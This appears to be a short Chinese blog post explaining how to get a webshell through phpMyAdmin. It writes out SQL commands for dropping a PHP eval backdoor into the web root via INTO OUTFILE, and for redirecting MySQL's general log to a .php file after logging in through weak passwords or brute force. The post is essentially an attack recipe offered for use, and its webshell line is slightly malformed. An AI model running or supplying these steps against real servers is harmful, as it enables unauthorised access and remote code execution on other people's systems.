尝试用phpmyadmin去getshell
PHPmyadmin getshell的方法
1、 show global variables like ‘% secure-file-priv %’如果该参数设置为空或者指定文件夹可以利用,然后写木马,select “<?php @eval($_POST[k];?)>” into outfile “/var/www/html/conf.php”
2、 利用日志文件getshell
常见的日志文件分为业务(常见服务)日志和系统日志
利用phpmyadmin的日志文件去getshell,mysql>5.0会创建日主文件,是全局变量且可读写
(1)通过弱口令或者爆破的方式登陆phpmyadmin,执行sql语句:
select @@datadir;
猜源码存放的位置:D:\phpstudy_pro\www
查看日志状态:show variables like ‘%general%’;
执行命令set global general_log = ‘on’来开启日志记录功能并修改记录的路径和文件名。
再次查看,已开启
修改路径
Set global general_log_file=’H:\\webroot\\log.php’
查看,路径已经改变
写入木马即可
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步